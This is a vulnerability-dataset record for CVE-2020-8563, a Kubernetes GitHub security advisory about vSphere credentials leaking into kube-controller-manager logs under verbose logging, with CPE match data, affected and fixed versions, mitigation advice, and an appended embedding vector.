[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "515661A5-8AFF-45B7-932C-3B5CD32945F0", "versionEndExcluding": "1.19.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/95621
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: 5.6 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N (Medium) In Kubernetes clusters using VSphere as a cloud provider, with a logging level set to 4 or above, VSphere cloud credentials will be leaked in the cloud controller manager's log. ### Am I vulnerable? If you are using VSphere as a cloud provider, have verbose logging enabled, and an attacker can access cluster logs, then you may be vulnerable to this. #### Affected Versions kube-controller-manager v1.19.0 - v1.19.2 #### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to cluster logs. #### Fixed Versions v1.19.3 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek0405) /area security /kind bug /committee product-security
CVE-2020-8563: Secret leaks in kube-controller-manager when using vSphere provider
https://api.github.com/repos/kubernetes/kubernetes/issues/95621/comments
3
2020-10-15T22:00:44
2021-12-02T22:54:17Z
https://github.com/kubernetes/kubernetes/issues/95621
722,704,051
95,621
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2020-8563: Secret leaks in kube-controller-manager when using vSphere provider Issue date: --- start body --- CVSS Rating: 5.6 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N (Medium) In Kubernetes clusters using VSphere as a cloud provider, with a logging level set to 4 or above, VSphere cloud credentials will be leaked in the cloud controller manager's log. ### Am I vulnerable? If you are using VSphere as a cloud provider, have verbose logging enabled, and an attacker can access cluster logs, then you may be vulnerable to this. #### Affected Versions kube-controller-manager v1.19.0 - v1.19.2 #### How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to cluster logs. #### Fixed Versions v1.19.3 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek0405) /area security /kind bug /committee product-security --- end body ---
1,130
[ -0.002616270212456584, -0.03138856589794159, -0.009209537878632545, -0.013717470690608025, 0.04314257949590683, -0.038521114736795425, 0.020048610866069794, 0.02305389940738678, -0.003586310427635908, 0.02573862299323082, -0.018659500405192375, -0.008661908097565174, -0.04060478135943413, 0.007913924753665924, 0.011687231250107288, 0.05887693166732788, -0.0049553862772881985, 0.000871533527970314, 0.024683432653546333, 0.0045980908907949924, 0.009957521222531796, 0.008127634413540363, -0.01548057235777378, 0.04159318655729294, 0.03742585331201553, 0.004027085844427347, 0.01760431006550789, 0.017337173223495483, -0.04015064984560013, 0.023882022127509117, 0.015427145175635815, 0.035075049847364426, -0.006795290391892195, -0.001360727590508759, 0.03723885864019394, 0.006287730298936367, 0.006451351568102837, 0.059624914079904556, -0.011900940909981728, -0.012822562828660011, -0.04720305651426315, -0.057541247457265854, 0.0014041373506188393, 0.006958911661058664, -0.00846155546605587, -0.0012438553385436535, 0.01393117941915989, -0.016883039847016335, -0.019020134583115578, 0.025190992280840874, -0.018205367028713226, -0.028717197477817535, -0.02788907289505005, -0.0548698827624321, 0.009369820356369019, -0.011019389145076275, 0.011874226853251457, 0.014265100471675396, 0.013036271557211876, 0.01720360480248928, 0.022052135318517685, 0.009837309829890728, -0.005316020455211401, 0.023494673892855644, 0.0019968468695878983, 0.004908637143671513, -0.018205367028713226, 0.0035295437555760145, -0.025017352774739265, -0.016428908333182335, -0.013370192609727383, 0.021678144112229347, 0.04749690741300583, 0.002334106946364045, 0.07933960109949112, 0.010985997505486012, 0.05390818789601326, 0.035128477960824966, -0.026059186086058617, 0.0015268533024936914, -0.02178499847650528, 0.0042675090953707695, 0.005556443706154823, 0.0103381909430027, 0.08185069262981415, -0.0006903814501129091, -0.049260009080171585, -0.06576906144618988, -0.003539561526849866, -0.016455622389912605, -0.004133940674364567, 0.000742973992601037, 0.006017254665493965, -0.04009722173213959, 0.029759030789136887, 0.0021454417146742344, -0.0284767746925354, -0.016308696940541267, -0.050702549517154694, -0.027835646644234657, -0.01821872405707836, 0.010972640477120876, -0.008541696704924107, -0.012501997873187065, 0.05107653886079788, -0.007192655932158232, -0.01907356083393097, 0.008735370822250843, 0.010678790509700775, 0.10252707451581955, 0.02690066769719124, -0.011667195707559586, -0.0344606377184391, -0.016001489013433456, -0.03325852006673813, 0.020582884550094604, -0.014786017127335072, 0.03333866223692894, -0.06080031767487526, -0.023868665099143982, -0.017818018794059753, -0.008862260729074478, 0.004364346154034138, -0.031628988683223724, -0.015200079418718815, 0.057594675570726395, -0.016629260033369064, 0.007032373920083046, -0.04763047769665718, -0.011052781715989113, 0.012087936513125896, 0.017497455701231956, -0.03870810940861702, 0.006508118472993374, -0.010685469023883343, 0.02396216429769993, 0.01019794400781393, 0.03830740600824356, 0.0013966241385787725, -0.019794831052422523, -0.04223431646823883, -0.017163533717393875, -0.014839444309473038, 0.029278183355927467, 0.0056365844793617725, -0.019701333716511726, 0.02039588801562786, -0.000023622294975211844, -0.01740395650267601, -0.0019868293311446905, 0.007807070389389992, -0.0005463780835270882, 0.047336626797914505, 0.021798355504870415, 0.0758133977651596, -0.0038601255510002375, 0.01052518654614687, 0.0328311026096344, -0.0000642275990685448, -0.00957685150206089, 0.005429553799331188, -0.017497455701231956, 0.003693165024742484, -0.03587646037340164, 0.03884167969226837, 0.024483079090714455, -0.018499217927455902, 0.024817001074552536, -0.01737724244594574, 0.03093443252146244, -0.0039102137088775635, -0.025591697543859482, 0.04557352513074875, 0.0031639004591852427, -0.034567490220069885, -0.011667195707559586, -0.010117802768945694, 0.030613867565989494, -0.01298284437507391, -0.0030269930139184, 0.001183749525807798, 0.02452315017580986, -0.05620556324720383, -0.002976904856041074, 0.03977665677666664, -0.036090169101953506, -0.007446435745805502, -0.008541696704924107, -0.0016345428302884102, -0.04477211460471153, -0.02485707215964794, 0.016348766162991524, 0.007586682680994272, -0.035101763904094696, -0.046775639057159424, 0.03635730594396591, -0.0016061594942584634, 0.004120583645999432, 0.004387720488011837, -0.03152213245630264, 0.00018376084335613996, 0.00933642778545618, -0.012976165860891342, 0.02336110547184944, -0.017190247774124146, 0.01203450933098793, -0.017444027587771416, 0.010211301036179066, 0.008327987045049667, -0.00922289490699768, -0.03544904291629791, 0.010331512428820133, 0.03681144118309021, 0.010872464627027512, 0.03125499561429024, -0.0008873947663232684, 0.003793341340497136, 0.03710528835654259, -0.03940266743302345, -0.006427977234125137, 0.037933412939310074, -0.03499491140246391, 0.012014473788440228, -0.018071798607707024, -0.023695027455687523, -0.009757168591022491, -0.006274373736232519, -0.011874226853251457, -0.01596141792833805, -0.02356145903468132, 0.011954368092119694, -0.023013828322291374, 0.02135758101940155, 0.00946331862360239, 0.011179671622812748, -0.037986841052770615, 0.009596886113286018, 0.011233098804950714, -0.00042741873767226934, -0.0006511457613669336, 0.024002233520150185, -0.015974774956703186, 0.001970133278518915, -0.014705875888466835, -0.024202587082982063, 0.012395143508911133, -0.03395307809114456, 0.024416295811533928, -0.008581766858696938, 0.020636310800909996, -0.025952331721782684, 0.03766627609729767, -0.029117902740836143, -0.028583629056811333, 0.002000186126679182, -0.022506268694996834, 0.0029585391748696566, 0.0058102235198020935, 0.011480200104415417, 0.02186514064669609, 0.03251053765416145, 0.013944536447525024, 0.008648551069200039, 0.02796921506524086, 0.022613123059272766, 0.012027830816805363, -0.01978147402405739, 0.028343206271529198, 0.018005015328526497, 0.013256659731268883, 0.019313985481858253, -0.01672275923192501, -0.025591697543859482, -0.014572307467460632, 0.0017088401364162564, -0.023267608135938644, 0.021678144112229347, 0.0022906973026692867, -0.006244320888072252, -0.030186448246240616, 0.012315002270042896, -0.013463690876960754, -0.00045705423690378666, 0.018459146842360497, 0.02209220640361309, 0.007059087511152029, 0.0037031827960163355, -0.04800446704030037, 0.006965589709579945, 0.0027398208621889353, -0.01300955843180418, -0.033498942852020264, -0.02214563451707363, 0.012829240411520004, 0.019167060032486916, 0.003970319405198097, -0.009129397571086884, 0.0413527637720108, -0.02621946856379509, -0.011039424687623978, -0.0308810044080019, -0.0062509989365935326, -0.001026806770823896, 0.027782218530774117, -0.004130601417273283, 0.04546666890382767, -0.023174110800027847, 0.026860596612095833, -0.025471486151218414, 0.022158989682793617, 0.0001304378529312089, -0.04693591967225075, -0.01915370300412178, -0.03389964997768402, -0.01005769707262516, 0.02842334657907486, 0.0018399041146039963, 0.002071979222819209, -0.011800764128565788, 0.027728790417313576, 0.04792432859539986, 0.009423247538506985, -0.033579085022211075, 0.0013181527610868216, 0.019367411732673645, -0.058663222938776016, -0.02014210820198059, 0.023040542379021645, -0.02641982212662697, -0.007025695405900478, -0.012936095707118511, -0.005880346987396479, -0.059624914079904556, 0.004648178815841675, 0.009009186178445816, -0.02477692998945713, -0.007446435745805502, 0.005302663892507553, -0.007473149802535772, -0.02153121866285801, -0.00293182535097003, -0.02358817122876644, -0.03646416217088699, 0.005008813459426165, 0.005055562127381563, -0.015921348705887794, 0.016736114397644997, 0.0017230318626388907, 0.02796921506524086, -0.010191265493631363, 0.000693720648996532, 0.01019794400781393, 0.020275676622986794, -0.0209034476429224, 0.020449316129088402, -0.028797337785363197, -0.015093224123120308, 0.014759304001927376, 0.034140072762966156, -0.0030620545148849487, 0.035529185086488724, -0.05016827583312988, -0.028717197477817535, 0.0397232286632061, 0.0003727391886059195, -0.01811186969280243, -0.025297846645116806, -0.001823208061978221, -0.050301842391490936, -0.020703095942735672, -0.016963182017207146, 0.005780170671641827, 0.016802899539470673, 0.029117902740836143, -0.03389964997768402, -0.02983917109668255, -0.05780838429927826, 0.02568519487977028, -0.03860125690698624, 0.035048335790634155, -0.01237510796636343, 0.00957685150206089, 0.02525777742266655, -0.02320082299411297, 0.014786017127335072, 0.05738096684217453, 0.016936467960476875, 0.02485707215964794, 0.011006033048033714, -0.007893890142440796, -0.051664240658283234, 0.0653950646519661, -0.039990365505218506, -0.04023078829050064, -0.02743494138121605, 0.010799001902341843, -0.004461183212697506, -0.0037298963870853186, 0.05673983693122864, 0.01978147402405739, 0.005329377483576536, 0.06614305078983307, -0.011760693974792957, -0.014692519791424274, -0.03499491140246391, -0.011186350136995316, 0.001208793604746461, -0.029278183355927467, -0.024683432653546333, -0.008661908097565174, -0.015921348705887794, -0.030560439452528954, -0.04693591967225075, -0.016268625855445862, 0.03467434644699097, 0.0569535493850708, 0.06069346144795418, 0.01326333824545145, -0.00892904493957758, 0.022906973958015442, 0.02949189394712448, 0.010051018558442593, 0.0183656495064497, 0.026125971227884293, 0.015333647839725018, 0.015119938179850578, 0.0243495125323534, 0.023240894079208374, 0.044451549649238586, -0.010191265493631363, 0.02429608441889286, -0.013570545241236687, 0.004651518072932959, -0.010772287845611572, -0.026620173826813698, 0.002509415615350008, -0.004027085844427347, -0.07602711021900177, 0.023294322192668915, -0.003956962376832962, -0.038440972566604614, 0.02330767922103405, -0.025645125657320023, 0.019741402938961983, -0.04268844798207283, -0.013330122455954552, -0.01644226536154747, 0.009930807165801525, -0.02842334657907486, -0.0248036440461874, -0.0413527637720108, -0.005199148319661617, -0.011934332549571991, -0.011253134347498417, -0.014412025921046734, -0.004274187609553337, 0.007005660329014063, -0.029705602675676346, 0.035021621733903885, 0.027020879089832306, 0.0031972925644367933, 0.026286253705620766, -0.026232825592160225, -0.0017113445792347193, -0.0072126914747059345, 0.03539561480283737, -0.03771970421075821, -0.03194954991340637, 0.01568092592060566, -0.029251471161842346, 0.0569535493850708, 0.028263064101338387, 0.00933642778545618, -0.010678790509700775, -0.016295339912176132, 0.0445316918194294, 0.022332629188895226, -0.008134312927722931, 0.007720251102000475, 0.018993420526385307, 0.014051390811800957, 0.012922738678753376, 0.002946852007880807, 0.04116576910018921, 0.02019553631544113, -0.02754179574549198, 0.0058269198052585125, 0.01138670276850462, -0.020809950307011604, -0.011713945306837559, 0.031148141250014305, -0.042982298880815506, 0.019460909068584442, -0.042875442653894424, 0.00013054220471531153, -0.004280865658074617, -0.008428163826465607, 0.0021738249342888594, 0.0962226465344429, 0.005229201167821884, 0.015079868026077747, -0.015493929386138916, 0.007139228750020266, -0.027648650109767914, -0.029572034254670143, -0.03333866223692894, -0.0344606377184391, -0.020689738914370537, -0.01161376852542162, 0.016535762697458267, -0.013670721091330051, -0.008848903700709343, 0.002694741589948535, -0.0060840388759970665, -0.0036798082292079926, -0.021918566897511482, 0.038948532193899155, 0.016402194276452065, 0.021437721326947212, 0.004925333429127932, -0.01398460753262043, -0.023187467828392982, 0.026767099276185036, 0.03189612552523613, 0.007867176085710526, 0.028556915000081062, 0.019167060032486916, 0.006150823086500168, 0.0003547909436747432, -0.0397232286632061, 0.012321680784225464, 0.023641599342226982, -0.0189533494412899, -0.033018097281455994, 0.021237369626760483, -0.0013306747423484921, 0.021918566897511482, -0.010391618125140667, -0.0269808080047369, 0.0014007982099428773, -0.021037016063928604, 0.019955113530158997, -0.02378852479159832, 0.0034226891584694386, -0.004037103615701199, 0.0061842151917517185, -0.033579085022211075, 0.03812040761113167, 0.04303572326898575, -0.017003251239657402, 0.017417313531041145, -0.011827478185296059, 0.010725539177656174, 0.019928399473428726, -0.01940748281776905, 0.008768762461841106, 0.00785381905734539, 0.01565421186387539, 0.021958637982606888, -0.019701333716511726, -0.013543831184506416, -0.00038901783409528434, 0.00882886815816164, -0.036544304341077805, -0.007907247170805931, -0.02350803092122078, -0.01819201000034809, -0.011279847472906113, -0.024256013333797455, 0.0008293760474771261, 0.01398460753262043, -0.013103055767714977, 0.023695027455687523, -0.012822562828660011, -0.012962808832526207, 0.050275128334760666, -0.009242930449545383, -0.0042508128099143505, -0.013810968026518822, -0.0010635380167514086, -0.009196181781589985, 0.018793068826198578, 0.0039102137088775635, -0.021063730120658875, 0.002128745662048459, 0.017617667093873024, -0.009743811562657356, 0.014759304001927376, -0.006534832064062357, -0.022893616929650307, -0.0010685469023883343, 0.0011127913603559136, 0.0023491336032748222, -0.011600411497056484, -0.002023560693487525, -0.003289120737463236, 0.012602174654603004, 0.009997591376304626, 0.011026067659258842, 0.03686486557126045, 0.01349040400236845, 0.019420839846134186, 0.014358598738908768, -0.020382530987262726, 0.004257491324096918, 0.030587153509259224, -0.021598003804683685, 0.030079593881964684, -0.0034226891584694386, 0.015173365361988544, -0.00020557004609145224, -0.022225774824619293, 0.022332629188895226, -0.014612378552556038, 0.011259812861680984, 0.013483725488185883, 0.025070780888199806, 0.02328096516430378, 0.02163807488977909, -0.011440129950642586, 0.017671093344688416, -0.010358226485550404, 0.006070681847631931, 0.0010293112136423588, 0.015801137313246727, 0.005900382064282894, 0.002509415615350008, 0.0048552099615335464, 0.011961046606302261, 0.012248218059539795, -0.010391618125140667, 0.012014473788440228, 0.007807070389389992, -0.024189230054616928, -0.03865468129515648, 0.013971250504255295, 0.016575833782553673, -0.017924873158335686, -0.017016608268022537, -0.007640109863132238, 0.0010568596189841628, -0.012822562828660011, -0.029278183355927467, 0.033124953508377075, -0.03985679894685745, -0.001619516289792955, -0.022025423124432564, 0.02234598621726036, 0.003255728632211685, -0.014131532050669193, 0.007326224353164434, -0.003803358878940344, 0.007179299369454384, 0.024456366896629333, 0.02039588801562786, 0.0020385871175676584, 0.0069388761185109615, 0.05428218096494675, -0.0027999267913401127, -0.019754759967327118, -0.003250719979405403, -0.038547828793525696, -0.00606066407635808, 0.005466285161674023, -0.0031639004591852427, -0.0007738616550341249, -0.01867285557091236, -0.006594937760382891, -0.01001762691885233, 0.04218088835477829, -0.0030052880756556988, -0.00784046296030283, -0.0012388465693220496, 0.015200079418718815, -0.015293576754629612, -0.01275577861815691, -0.016148414462804794, 0.01443873904645443, -0.02579204924404621, 0.00980391725897789, -0.011460165493190289, -0.014011320658028126, 0.005065579898655415, 0.01443873904645443, -0.008000744506716728, -0.01393117941915989, 0.01610834337770939, -0.0034694380592554808, 0.004027085844427347, -0.011072817258536816, -0.012254896573722363, -0.021985352039337158, 0.030239876359701157, -0.02887747809290886, 0.009884058497846127, -0.04015064984560013, 0.010445045307278633, -0.014358598738908768, -0.01103274617344141, 0.0028316492680460215, -0.018151940777897835, 0.028182923793792725, -0.033071525394916534, 0.08254524320363998, -0.005319359712302685, 0.006614972837269306, -0.0010919213527813554, 0.017297102138400078, 0.025444772094488144, 0.011740658432245255, -0.029304897412657738, -0.011707266792654991, -0.031094713136553764, 0.03333866223692894, -0.022199060767889023, 0.0016011507250368595, 0.00636453228071332, 0.02528448961675167, -0.00558649655431509, 0.038975246250629425, 0.018993420526385307, 0.019901685416698456, -0.011072817258536816, -0.026059186086058617, -0.015119938179850578, 0.003357574576511979, 0.01760431006550789, 0.013543831184506416, 0.0005263428320176899, 0.007079123053699732, 0.020809950307011604, -0.02449643611907959, -0.012308323755860329, 0.021010302007198334, 0.005606531631201506, 0.012328359298408031, 0.01518672239035368, -0.0024493096861988306, 0.02358817122876644, 0.00007288867345778272, 0.015493929386138916, -0.006588259246200323, 0.03531547263264656, -0.033979788422584534, 0.021397650241851807, 0.003793341340497136, -0.02943846583366394, -0.009884058497846127, 0.03152213245630264, 0.021958637982606888, 0.03085429035127163, -0.016509048640727997, -0.01094592735171318, -0.01335015706717968, -0.017070036381483078, 0.015026439912617207, 0.006414620205760002, -0.003816715907305479, 0.023548102006316185, -0.0083213085308671, 0.030694007873535156, 0.02619275450706482, -0.0026513319462537766, 0.03822726383805275, 0.0401773639023304, -0.0080942427739501, 0.012054543942213058, -0.00915611069649458, -0.001407476607710123, -0.011099530383944511, 0.00544624961912632, -0.0003126334340777248, 0.008762083947658539, -0.010184586979448795, -0.013570545241236687, -0.0041673327796161175, 0.028289778158068657, 0.00151516601908952, -0.0035228654742240906, 0.033632513135671616, -0.015427145175635815, -0.0013265007873997092, -0.01935405470430851, 0.019207129254937172, -0.01636212319135666, 0.003846768755465746, 0.005933774169534445, -0.013904466293752193, 0.011820799671113491, 0.02695409394800663, -0.017243675887584686, 0.010718860663473606, 0.015694282948970795, -0.03243039548397064, 0.03520862013101578, -0.018285507336258888, -0.04645507410168648, 0.008608480915427208, -0.006464708596467972, -0.011560341343283653, 0.001208793604746461, 0.011126244440674782, -0.019340697675943375, 0.019140345975756645, -0.002970226341858506, -0.00994416419416666, -0.007159263826906681, -0.0012388465693220496, -0.007907247170805931, 0.003893517656251788, -0.022225774824619293, 0.0005897877854295075, -0.015614140778779984, 0.028663769364356995, -0.0060673425905406475, -0.015013083815574646, 0.020155465230345726, 0.01089249923825264, -0.01395789347589016, -0.011880905367434025, 0.02186514064669609, -0.026994165033102036, -0.012408500537276268, 0.0005300994380377233, 0.009610243141651154, -0.021370938047766685, -0.013062985613942146, 0.0008034971542656422, 0.010445045307278633, 0.0066383471712470055, 0.01717689074575901, 0.009283000603318214, -0.027127733454108238, 0.010071054100990295, -0.01669604517519474, 0.029598748311400414, 0.022733334451913834, -0.004604768939316273, -0.028209637850522995, 0.0006336148944683373, 0.017644379287958145, -0.021210655570030212, -0.019220486283302307, 0.002714776899665594, -0.010645397938787937, -0.035101763904094696, -0.054228752851486206, 0.009723776020109653, -0.007720251102000475, 0.007920603267848492, -0.008661908097565174, -0.020048610866069794, 0.019741402938961983, 0.015013083815574646, 0.005763474851846695, -0.01541378814727068, 0.026152685284614563, -0.0012388465693220496, 0.014452096074819565, -0.002360820770263672, -0.010465080849826336, -0.0044678617268800735, 0.024937212467193604, 0.003639737842604518, 0.0223994143307209, -0.0013699104310944676, 0.008394771255552769, 0.002566182054579258, -0.005593175068497658, -0.003926909528672695, -0.04455840587615967, -0.019541051238775253, -0.0030136359855532646, -0.02102365903556347, 0.01562749780714512, -0.02336110547184944, -0.016802899539470673, 0.007693537510931492, -0.005800205748528242, 0.008214454166591167, 0.005503016524016857, -0.0060673425905406475, -0.012348394840955734, 0.04549338296055794, 0.022960400208830833, -0.006411281414330006, 0.003716539591550827, -0.031655699014663696, 0.006788611877709627, 0.019968468695878983, -0.03432706743478775, 0.012822562828660011, -0.024897141382098198, -0.008187740109860897, -0.01087914314121008, -0.01570763811469078, 0.025591697543859482, 0.012201469391584396, -0.058609794825315475, -0.029598748311400414, -0.003616363275796175, -0.008975793607532978, -0.009937485679984093, -0.003916892223060131, -0.004097209312021732, 0.00424413476139307, 0.03235025703907013, -0.013623972423374653, 0.019487623125314713, -0.0012263244716450572, 0.008047493174672127, -0.024883784353733063, -0.012047865428030491, -0.015587427653372288, -0.039482805877923965, 0.024109087884426117, -0.007165942341089249, -0.000017400408978573978, -0.00733958138152957, 0.00966367032378912, -0.008989150635898113, 0.0341935008764267, -0.02110380120575428, 0.015280219726264477, 0.004417773336172104, -0.03723885864019394, -0.0032407022081315517, 0.032590679824352264, 0.00009433265222469345, 0.008581766858696938, -0.014091461896896362, -0.009383177384734154, 0.013089698739349842, 0.02345460280776024, 0.010939248837530613, -0.011159636080265045, -0.022078849375247955, 0.027835646644234657, 0.029759030789136887, -0.04760376363992691, -0.017510810866951942, 0.029678888618946075, 0.012582139112055302, -0.030239876359701157, -0.005566461477428675, 0.04119248315691948, 0.03771970421075821, -0.03587646037340164, 0.03181598335504532, 0.004204064141958952, -0.011840835213661194, -0.003384288167580962, 0.009523424319922924, 0.015801137313246727, 0.0012972826370969415, -0.010371582582592964, -0.02581876330077648, 0.0025227724108844995, -0.005232540424913168, -0.014425382949411869, 0.0083213085308671, 0.015253506600856781, -0.007446435745805502, -0.011186350136995316, -0.00667507853358984, 0.0121747562661767, -0.034033216536045074, -0.011152957566082478, 0.018405720591545105, 0.00929635763168335, 0.019086917862296104, 0.013310086913406849, -0.007746964693069458, 0.017043322324752808, 0.012101293541491032, 0.010217979550361633, -0.0000960022589424625, -0.008134312927722931, 0.0060239327140152454, -0.022866902872920036, -0.02850348688662052, -0.006858735345304012, 0.030800864100456238, 0.019527694210410118, -0.01091921329498291, -0.02839663252234459, -0.005008813459426165, 0.024389581754803658, -0.02644653432071209, -0.006431316491216421, 0.032136548310518265, -0.010712182149291039, -0.006120769772678614, -0.03643744811415672, 0.012281610630452633, -0.009449961595237255, -0.011119565926492214, -0.03277767449617386, -0.02997273951768875, -0.025444772094488144, -0.005302663892507553, 0.028316492214798927, 0.028263064101338387, 0.0224929116666317, 0.019247200340032578, -0.00785381905734539, 0.019594477489590645, -0.006972268223762512, -0.009984234347939491, -0.021451078355312347, -0.023427890613675117, 0.009009186178445816, 0.023548102006316185, -0.0011428442085161805, -0.010698825120925903, 0.009449961595237255, 0.01994175650179386, -0.009075970388948917, -0.0018566001672297716, 0.025805406272411346, -0.030640581622719765, -0.006765237543731928, -0.022225774824619293, 0.01214804220944643, 0.0033976451959460974, 0.011874226853251457, -0.01844578981399536, 0.009837309829890728, -0.013851039111614227, 0.024189230054616928, 0.007145907264202833, 0.004828496370464563, 0.01932734064757824, -0.02740822732448578, 0.027020879089832306, -0.02361488528549671, 0.02042260207235813, -0.01596141792833805, -0.028770623728632927, 0.004604768939316273, 0.036063455045223236, -0.013156482949852943, -0.02951860800385475, -0.009216216392815113, -0.005536408629268408, 0.003876821603626013, -0.018886566162109375, -0.012181433849036694, 0.006635008379817009, -0.04028421640396118, 0.028797337785363197, -0.012415179051458836, 0.0069388761185109615, 0.0013239963445812464, -0.02051609940826893, -0.016175128519535065, -0.0053794654086232185, -0.016455622389912605, -0.0028683803975582123, -0.02231927216053009, -0.004588073119521141, -0.008902330882847309, -0.019020134583115578, -0.014425382949411869, -0.026179397478699684, -0.018432432785630226, 0.02087673358619213, 0.004127262160181999, 0.01983490027487278, -0.0029117902740836143, 0.0031889446545392275, 0.01932734064757824, 0.015266863629221916, -0.00241591758094728, 0.018886566162109375, -0.006314444355666637, 0.006117430981248617, 0.01867285557091236, -0.023922093212604523, -0.009984234347939491, -0.017163533717393875, 0.0016362123424187303, -0.007640109863132238, 0.012194790877401829, -0.03825397789478302, 0.014959655702114105, -0.025137564167380333, 0.009523424319922924, 0.016054917126893997, 0.005917078349739313, -0.02556498348712921, -0.010204622521996498, -0.012695671990513802, -0.025190992280840874, -0.00027047592448070645, 0.0036330593284219503, -0.001100269379094243, 0.06737188249826431, 0.0011920975521206856, -0.005339395254850388, 0.009262965992093086, -0.026606816798448563, -0.016201842576265335, 0.021464435383677483, 0.005776831414550543, 0.0055698007345199585, -0.022987114265561104, 0.011954368092119694, -0.006571563426405191, 0.019006777554750443, -0.0003195205645170063, -0.012468606233596802, 0.0028333188965916634, 0.01994175650179386, 0.005326038226485252, -0.00650477921590209, 0.02214563451707363, -0.003539561526849866, -0.013971250504255295, -0.004785086493939161, 0.0002976070099975914, -0.006304426584392786, -0.003893517656251788, -0.026994165033102036, -0.033124953508377075, 0.002110379980877042, -0.008989150635898113, 0.008902330882847309, -0.019340697675943375, 0.007299510762095451, -0.026513319462537766, 0.010718860663473606, 0.021464435383677483, 0.02265319414436817, -0.025498200207948685, 0.00235915114171803, -0.019701333716511726, -0.01811186969280243, 0.01935405470430851, 0.004224099218845367, 0.025418058037757874, 0.01548057235777378, -0.02890419214963913, -0.016589190810918808, -0.014318527653813362, 0.006147483829408884, 0.005289306864142418, -0.01052518654614687, -0.013423619791865349, 0.01359058078378439, 0.017751235514879227, -0.013129769824445248, 0.034594204276800156, 0.010785644873976707, -0.007867176085710526, -0.0012505337363108993, 0.00007648875180166215, -0.026914024725556374, 0.0014976352686062455, -0.005372787360101938, -0.002686393680050969, -0.009523424319922924, 0.006344497203826904, -0.0027849003672599792, -0.0010810688836500049, -0.018712926656007767, 0.003382618771865964, 0.019647905603051186, 0.016081631183624268, -0.022893616929650307, 0.019794831052422523, 0.005679994355887175, 0.02523106336593628, -0.012882668524980545, -0.0035028301645070314, 0.012642244808375835, -0.006154161877930164, -0.02211892046034336, -0.009262965992093086, -0.031655699014663696, -0.007833784446120262, 0.013824325054883957, 0.03275096043944359, -0.030052879825234413, -0.0009909102227538824, 0.044344693422317505, 0.021878497675061226, 0.004568038042634726, 0.06742531061172485, 0.02401559054851532, -0.004568038042634726, 0.006564884912222624, 0.021704858168959618, 0.005382804665714502, 0.0011678882874548435, -0.034166786819696426, -0.0005960487760603428, 0.004501253832131624, 0.003282442456111312, 0.021544575691223145, 0.021544575691223145, 0.009102683514356613, -0.014425382949411869, 0.006835360545665026, 0.022893616929650307, -0.0005492998752743006, 0.011006033048033714, -0.036544304341077805, -0.025725265964865685, 0.004077174235135317, -0.002310732612386346, -0.028316492214798927, -0.009309714660048485, 0.017537524923682213, -0.004437808878719807, 0.0203157477080822, -0.004741676617413759, -0.029117902740836143, -0.017871446907520294, 0.004848531447350979, -0.004741676617413759, 0.029572034254670143, 0.010364904999732971, -0.018045084550976753, -0.0034560812637209892, 0.03625045344233513, 0.008581766858696938, 0.0004386885848361999, -0.007172620855271816, 0.00048042868729680777, 0.02107708714902401, -0.009363141842186451, -0.0016278643161058426, 0.022305915132164955, 0.007433079183101654, 0.0037566099781543016, -0.010812358930706978, -0.011800764128565788, 0.05099640041589737, -0.0014308510581031442, 0.012522033415734768, -0.013249981217086315, -0.006965589709579945, -0.012936095707118511, 0.005963827017694712, 0.01723031885921955, -0.02994602546095848, 0.022172346711158752, -0.025605054572224617, 0.009877379983663559, 0.011026067659258842, -0.023601528257131577, -0.00980391725897789, 0.016228554770350456, -0.004574716091156006, -0.009102683514356613, 0.003913552965968847, 0.01771116442978382, -0.004207403399050236, -0.009122719056904316, 0.01980818808078766, -0.0022756708785891533, 0.00933642778545618, -0.019340697675943375, -0.03245710954070091, -0.040497925132513046, -0.0013198223896324635, -0.001561080222018063, -0.00575011782348156, -0.005716725718230009, 0.00997087825089693, -0.00538948317989707, 0.004998795688152313, -0.0023240894079208374, -0.015974774956703186, 0.03432706743478775, 0.0002919720718637109, -0.0104984724894166, 0.025872191414237022, 0.0022155651822686195, -0.007673501968383789, 0.0012112980475649238, -0.0083213085308671, -0.0006340323016047478, 0.0341935008764267, -0.03534218668937683, -0.0121079720556736, -0.015266863629221916, 0.030667295679450035, -0.016829613596200943, -0.030800864100456238, 0.007286153733730316, 0.003613024018704891, 0.006624990608543158, -0.022866902872920036, 0.003389297053217888, -0.018766354769468307, -0.008848903700709343, -0.03224340081214905, -0.009670348837971687, 0.004100548569113016, 0.002360820770263672, -0.012101293541491032, 0.003816715907305479, -0.009009186178445816, 0.02460329234600067, -0.006801968440413475, 0.011466843076050282, -0.011533627286553383, 0.013971250504255295, -0.010999354533851147, 0.016482334583997726, -0.00966367032378912, -0.005900382064282894, 0.0006306931027211249, -0.011446808464825153, -0.026085900142788887, 0.006878770422190428, 0.04065820947289467, -0.010685469023883343, -0.013209911063313484, 0.02469678968191147, 0.0121079720556736, 0.0009800578700378537, -0.013149804435670376, 0.012254896573722363, 0.0037065218202769756, -0.019233843311667442, 0.0028299796395003796, 0.0063812281005084515, 0.009570172987878323, 0.004654857330024242, 0.02042260207235813, 0.000654067553114146, 0.019167060032486916, -0.015266863629221916, -0.005746778566390276, 0.013002879917621613, 0.014278457500040531, -0.027274658903479576, -0.0008656899444758892, 0.0031989621929824352, -0.0002443883568048477, 0.018459146842360497, -0.036571014672517776, -0.02802264131605625, 0.00997087825089693, -0.011974403634667397, -0.02231927216053009, 0.012208147905766964, -0.03221668675541878, -0.015146652236580849, -0.004000372253358364, -0.007606717757880688, 0.03448735177516937, 0.033018097281455994, -0.017003251239657402, 0.0067385234870016575, -0.00846155546605587, 0.04007050767540932, 0.0011436790227890015, 